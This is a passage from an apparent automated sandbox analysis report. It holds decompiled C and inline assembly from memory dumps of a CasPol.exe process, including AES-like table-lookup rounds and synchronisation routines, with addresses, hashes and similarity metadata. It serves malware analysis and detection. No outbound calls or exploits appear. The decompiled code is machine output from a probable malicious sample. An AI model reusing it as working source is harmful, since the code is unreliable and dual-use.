				 *_a8 = (( *(_t273 + 4 + (_t431 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t606 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t411) & 0xff00ff00 | (( *(_t273 + 4 + (_t431 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t606 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t411) & 0x00ff00ff;
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				_a8[1] = (( *(_t273 + 4 + (_t606 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t431 & 0x000000ff) * 4) & 0x000000ff ^ _t411[1]) & 0xff00ff00 | (( *(_t273 + 4 + (_t606 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t431 & 0x000000ff) * 4) & 0x000000ff ^ _t411[1]) & 0x00ff00ff;
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				_t359 = _a8;
				_t359[2] = (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t431 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t606 & 0x000000ff) * 4) & 0x000000ff ^ _t411[2]) & 0xff00ff00 | (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t431 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t606 & 0x000000ff) * 4) & 0x000000ff ^ _t411[2]) & 0x00ff00ff;
				_t274 =  *(_t273 + 5 + (_v16 & 0x000000ff) * 4) & 0x000000ff;
				asm("ror ecx, 0x8");
				asm("rol edi, 0x8");
				_t359[3] = (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t431 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t606 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t411[3]) & 0xff00ff00 | (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t431 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t606 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t411[3]) & 0x00ff00ff;
				asm("in eax, 0x5d");
				return _t274;
			}



















                                                                0x004057d3
                                                                0x004057e2
                                                                0x004057eb
                                                                0x004057f9
                                                                0x004057fd
                                                                0x00405806
                                                                0x00405817
                                                                0x0040581a
                                                                0x0040581f
                                                                0x00405828
                                                                0x00405836
                                                                0x0040583b
                                                                0x00405844
                                                                0x00405854
                                                                0x00405874
                                                                0x00405877
                                                                0x00405889
                                                                0x0040588e
                                                                0x004058a3
                                                                0x004058c0
                                                                0x004058c3
                                                                0x004058d4
                                                                0x004058e9
                                                                0x00405909
                                                                0x0040590c
                                                                0x0040591e
                                                                0x0040593c
                                                                0x00405959
                                                                0x0040595c
                                                                0x0040596e
                                                                0x00405983
                                                                0x00405989
                                                                0x00405991
                                                                0x00405992
                                                                0x00405995
                                                                0x004059a3
                                                                0x004059b3
                                                                0x004059c5
                                                                0x004059d7
                                                                0x004059f3
                                                                0x00405a06
                                                                0x00405a13
                                                                0x00405a24
                                                                0x00405a3b
                                                                0x00405a5d
                                                                0x00405a60
                                                                0x00405a71
                                                                0x00405a8c
                                                                0x00405aa3
                                                                0x00405aa6
                                                                0x00405ab8
                                                                0x00405ac0
                                                                0x00405ad5
                                                                0x00405af2
                                                                0x00405af5
                                                                0x00405b06
                                                                0x00405b2a
                                                                0x00405b3a
                                                                0x00405b3d
                                                                0x00405b4f
                                                                0x00405b67
                                                                0x00405b6a
                                                                0x00405b7d
                                                                0x00405b8a
                                                                0x00405b9c
                                                                0x00405bb4
                                                                0x00405bd7
                                                                0x00405bda
                                                                0x00405bec
                                                                0x00405c01
                                                                0x00405c07
                                                                0x00405c07
                                                                0x00405c0a
                                                                0x00405c0a
                                                                0x004059a3
                                                                0x00405c6e
                                                                0x00405c77
                                                                0x00405c85
                                                                0x00405ce3
                                                                0x00405cec
                                                                0x00405cfa
                                                                0x00405d5c
                                                                0x00405d65
                                                                0x00405d72
                                                                0x00405d75
                                                                0x00405dc1
                                                                0x00405dcd
                                                                0x00405dd6
                                                                0x00405de3
                                                                0x00405de8
                                                                0x00405dea

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                • Instruction ID: b48a8abfd398b33141c675c61473ff866cda4f087bcb68e308b342261f2062df
                                                                • Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                • Instruction Fuzzy Hash: 13026E73E547164FE720DE4ACDC4725B3A3EFC8311F5B81B8CA142B613CA39BA525A90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016520A0 Relevance: .4, Instructions: 420COMMONCrypto
                                                                Download Yara Rule
                                                                C-Code - Quality: 92%
                                                                			E016520A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x1718714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E01652EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E01652EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E016258EC(_t240);
									_t221 =  *0x1715cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x1715cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E01664A2C(0x1716e40, 0x1664b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E01647D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x1605c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E0165F6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E0165F6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E016A7016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L01642400(_t267 + 0x20);
															}
															L01642400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E01652397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E01642280(_t134, 0x1718608);
									__eflags =  *0x1716e48 - _t253; // 0x0
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E0163FFB0(_t198, _t241, 0x1718608);
										__eflags = _t253;
										if(_t253 != 0) {
											L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x1716e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x1718608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E01656B90(_t210,  &_v64);
										_t262 =  *0x1718608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E0165E180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E016697C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E0166006A(0x1718608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x1718608);
												E0166B180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x1716904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x1716e48; // 0x0
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E0163FFB0(_t198, _t240, 0x1718608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E016600C2(0x1718608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}











































































                                                                0x016520a0
                                                                0x016520a8
                                                                0x016520ad
                                                                0x016520b3
                                                                0x016520b8
                                                                0x016520c2
                                                                0x016520c7
                                                                0x016520cb
                                                                0x016520d2
                                                                0x01652263
                                                                0x01652266
                                                                0x01695836
                                                                0x01695836
                                                                0x00000000
                                                                0x0165226c
                                                                0x0165226c
                                                                0x01652270
                                                                0x01652274
                                                                0x016520e2
                                                                0x016520e2
                                                                0x016520e6
                                                                0x016520ee
                                                                0x016957dc
                                                                0x016957de
                                                                0x016957ec
                                                                0x016957ec
                                                                0x016957f1
                                                                0x016957f3
                                                                0x016957f8
                                                                0x00000000
                                                                0x016957f8
                                                                0x016957e0
                                                                0x016957e4
                                                                0x016957ea
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x016957ea
                                                                0x016520f4
                                                                0x016520f4
                                                                0x016520f8
                                                                0x016520f8
                                                                0x016520fc
                                                                0x01652100
                                                                0x01652106
                                                                0x01652201
                                                                0x01652206
                                                                0x0165220b
                                                                0x0165220e
                                                                0x016522a9
                                                                0x016522ac
                                                                0x00000000
                                                                0x00000000
                                                                0x016522b2
                                                                0x016522b5
                                                                0x01695801
                                                                0x01695806
                                                                0x00000000
                                                                0x00000000
                                                                0x01695810
                                                                0x01695815
                                                                0x01695818
                                                                0x00000000
                                                                0x00000000
                                                                0x0169581e
                                                                0x016522bb
                                                                0x016522bb
                                                                0x01652218
                                                                0x01652218
                                                                0x0165221c
                                                                0x01652220
                                                                0x01652222
                                                                0x016522c2
                                                                0x016522c4
                                                                0x016522dc
                                                                0x016522dc
                                                                0x016522e1
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x016522e7
                                                                0x016522c8
                                                                0x016522cd
                                                                0x016522d3
                                                                0x016522d6
                                                                0x01695823
                                                                0x01695825
                                                                0x01695827
                                                                0x00000000
                                                                0x00000000
                                                                0x0169582d
                                                                0x00000000
                                                                0x0169582d
                                                                0x00000000
                                                                0x01652228
                                                                0x01652228
                                                                0x00000000
                                                                0x01652228
                                                                0x01652222
                                                                0x01652214
                                                                0x01652214
                                                                0x00000000
                                                                0x01652114
                                                                0x01652114
                                                                0x01652114
                                                                0x0165211a
                                                                0x0165211c
                                                                0x01652348
                                                                0x0165234d
                                                                0x01695840
                                                                0x01695845
                                                                0x01695848
                                                                0x0169584e
                                                                0x0169584e
                                                                0x01695848
                                                                0x01652353
                                                                0x01652355
                                                                0x01652388
                                                                0x01652388
                                                                0x01652368
                                                                0x0165236a
                                                                0x0165236c
                                                                0x0165238f
                                                                0x00000000
                                                                0x0165236e
                                                                0x0165236e
                                                                0x0165218e
                                                                0x0165218e
                                                                0x01652191
                                                                0x01652195
                                                                0x01695a03
                                                                0x01695a06
                                                                0x01695a0c
                                                                0x01695a0f
                                                                0x01695a11
                                                                0x01695a13
                                                                0x01695a13
                                                                0x01695a19
                                                                0x01695a1f
                                                                0x00000000
                                                                0x0165219b
                                                                0x0165219b
                                                                0x016521a0
                                                                0x01652282
                                                                0x01652284
                                                                0x01652284
                                                                0x01652284
                                                                0x01652284
                                                                0x016521a6
                                                                0x016521a9
                                                                0x016521ac
                                                                0x016521ae
                                                                0x016521b3
                                                                0x0165228b
                                                                0x01652290
                                                                0x01652379
                                                                0x01652296
                                                                0x01652298
                                                                0x01652298
                                                                0x01652290
                                                                0x016521b9
                                                                0x016521be
                                                                0x016522a2
                                                                0x016522a2
                                                                0x016521c4
                                                                0x016521c8
                                                                0x016521cc
                                                                0x016521d0
                                                                0x016521d4
                                                                0x016521de
                                                                0x016521e3
                                                                0x01695a29
                                                                0x01695a2c
                                                                0x00000000
                                                                0x00000000
                                                                0x01695a3b
                                                                0x00000000
                                                                0x016521e9
                                                                0x016521e9
                                                                0x016521e9
                                                                0x016521ee
                                                                0x016521f1
                                                                0x01695a45
                                                                0x01695a4b
                                                                0x01695a52
                                                                0x01695a58
                                                                0x01695a5d
                                                                0x01695a5f
                                                                0x01695a71
                                                                0x01695a61
                                                                0x01695a6a
                                                                0x01695a6a
                                                                0x01695a76
                                                                0x01695a79
                                                                0x01695a7f
                                                                0x01695a83
                                                                0x01695a85
                                                                0x01695a87
                                                                0x01695a87
                                                                0x01695a8c
                                                                0x01695a91
                                                                0x01695a97
                                                                0x01695a9f
                                                                0x01695aa0
                                                                0x01695aa1
                                                                0x01695aa6
                                                                0x01695aab
                                                                0x01695ab1
                                                                0x01695ab3
                                                                0x01695ab9
                                                                0x01695aca
                                                                0x01695ad4
                                                                0x01695ad4
                                                                0x01695ade
                                                                0x01695ade
                                                                0x01695aab
                                                                0x01695a79
                                                                0x01695a52
                                                                0x016521f7
                                                                0x016521f9
                                                                0x016521fe
                                                                0x016521fe
                                                                0x016521e3
                                                                0x01652195
                                                                0x0165236c
                                                                0x01652122
                                                                0x01652122
                                                                0x01652124
                                                                0x01652231
                                                                0x01652236
                                                                0x01652236
                                                                0x01652238
                                                                0x01652238
                                                                0x01652240
                                                                0x01652242
                                                                0x01652244
                                                                0x016959fc
                                                                0x0165218c
                                                                0x0165218c
                                                                0x00000000
                                                                0x0165218c
                                                                0x0165224a
                                                                0x0165224f
                                                                0x01652256
                                                                0x01652304
                                                                0x01652309
                                                                0x0165230f
                                                                0x0165231e
                                                                0x0165231e
                                                                0x0165231e
                                                                0x01652320
                                                                0x01652325
                                                                0x0165232a
                                                                0x0165232c
                                                                0x0165233e
                                                                0x0165233e
                                                                0x00000000
                                                                0x0165232c
                                                                0x01652311
                                                                0x01652317
                                                                0x0165231a
                                                                0x0165231c
                                                                0x01652380
                                                                0x01652380
                                                                0x01652380
                                                                0x01652384
                                                                0x00000000
                                                                0x00000000
                                                                0x01652386
                                                                0x00000000
                                                                0x0165231c
                                                                0x0165225c
                                                                0x0165225c
                                                                0x00000000
                                                                0x0165225c
                                                                0x0165212a
                                                                0x01652134
                                                                0x01652138
                                                                0x0165213d
                                                                0x01695858
                                                                0x01695863
                                                                0x01695863
                                                                0x01695867
                                                                0x0169586a
                                                                0x00000000
                                                                0x00000000
                                                                0x0169586c
                                                                0x0169586c
                                                                0x01695871
                                                                0x01695875
                                                                0x01695877
                                                                0x01695997
                                                                0x0169599c
                                                                0x016959a1
                                                                0x016959a7
                                                                0x016959a7
                                                                0x00000000
                                                                0x016959a7
                                                                0x0169587d
                                                                0x00000000
                                                                0x0169588b
                                                                0x0169588b
                                                                0x01695890
                                                                0x01695892
                                                                0x01695894
                                                                0x01695899
                                                                0x0169589b
                                                                0x016958a0
                                                                0x016958a0
                                                                0x016958aa
                                                                0x016958b2
                                                                0x016958b6
                                                                0x016958be
                                                                0x016958c6
                                                                0x016958c9
                                                                0x0169590d
                                                                0x01695917
                                                                0x0169591a
                                                                0x0169591c
                                                                0x01695920
                                                                0x01695928
                                                                0x0169592a
                                                                0x0169592c
                                                                0x0169592e
                                                                0x0169592e
                                                                0x016958cb
                                                                0x016958cd
                                                                0x016958d8
                                                                0x016958e0
                                                                0x016958f4
                                                                0x016958fe
                                                                0x016958fe
                                                                0x0169593a
                                                                0x0169593e
                                                                0x01695940
                                                                0x01695942
                                                                0x00000000
                                                                0x01695944
                                                                0x01695944
                                                                0x01695949
                                                                0x0169594e
                                                                0x0169594e
                                                                0x01695953
                                                                0x0169595b
                                                                0x01695976
                                                                0x01695976
                                                                0x0169597a
                                                                0x0169597f
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x01695981
                                                                0x01695981
                                                                0x01695981
                                                                0x01695983
                                                                0x01695988
                                                                0x0169598d
                                                                0x01695991
                                                                0x01695991
                                                                0x00000000
                                                                0x0169595d
                                                                0x0169595d
                                                                0x01695963
                                                                0x01695965
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x01695967
                                                                0x01695967
                                                                0x0169596b
                                                                0x0169596d
                                                                0x00000000
                                                                0x00000000
                                                                0x0169596f
                                                                0x01695971
                                                                0x01695971
                                                                0x01695974
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x01695974
                                                                0x00000000
                                                                0x01695967
                                                                0x0169595b
                                                                0x01695942
                                                                0x01695863
                                                                0x01652143
                                                                0x01652143
                                                                0x01652149
                                                                0x0165214f
                                                                0x016522f1
                                                                0x016522f6
                                                                0x00000000
                                                                0x01652173
                                                                0x01652173
                                                                0x0165217d
                                                                0x01652181
                                                                0x01652186
                                                                0x016959ae
                                                                0x016959b2
                                                                0x016959b5
                                                                0x016959b7
                                                                0x016959ba
                                                                0x016959cd
                                                                0x016959d1
                                                                0x016959d5
                                                                0x016959d9
                                                                0x016959db
                                                                0x00000000
                                                                0x00000000
                                                                0x016959dd
                                                                0x016959dd
                                                                0x016959e1
                                                                0x016959e4
                                                                0x016959e7
                                                                0x016959ee
                                                                0x016959ee
                                                                0x016959f3
                                                                0x016959f3
                                                                0x00000000
                                                                0x01652186
                                                                0x0165214f
                                                                0x01652106
                                                                0x01652266
                                                                0x016520d8
                                                                0x016520da
                                                                0x016520e0
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3cd4a08fadf0ef197ed62e6566153dc7af771d09e25ec833b198242e4988c199
                                                                • Instruction ID: fe53b5f4ff7270c1b711d1a3f2c75ede668cd0dafacbbbe14b9b28f3efacdbca
                                                                • Opcode Fuzzy Hash: 3cd4a08fadf0ef197ed62e6566153dc7af771d09e25ec833b198242e4988c199
                                                                • Instruction Fuzzy Hash: 24F1D135608341DFEB66CB2CCC5076B7BE6AB85364F04891EEE969B381D734D841CB92
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0163B090 Relevance: .4, Instructions: 405COMMONCrypto
                                                                Download Yara Rule
                                                                C-Code - Quality: 99%
                                                                			E0163B090(signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _t117;
				signed int _t119;
				signed int _t120;
				signed int _t121;
				signed int _t122;
				signed int _t123;
				signed int _t126;
				signed int _t134;
				signed int _t139;
				signed char _t143;
				signed int _t144;
				signed int _t146;
				signed int _t148;
				signed int* _t150;
				signed int _t152;
				signed int _t161;
				signed char _t165;
				signed int _t167;
				signed int _t170;
				signed int _t174;
				signed char _t177;
				signed int _t178;
				signed int _t181;
				signed int _t182;
				signed int _t187;
				signed int _t190;
				signed int _t192;
				signed int _t194;
				signed int _t196;
				signed int _t199;
				signed int _t202;
				signed int _t208;
				signed int _t211;

				_t182 = _a16;
				_t178 = _a8;
				_t161 = _a4;
				 *_t182 = 0;
				 *(_t182 + 4) = 0;
				_t5 = _t161 + 4; // 0x4
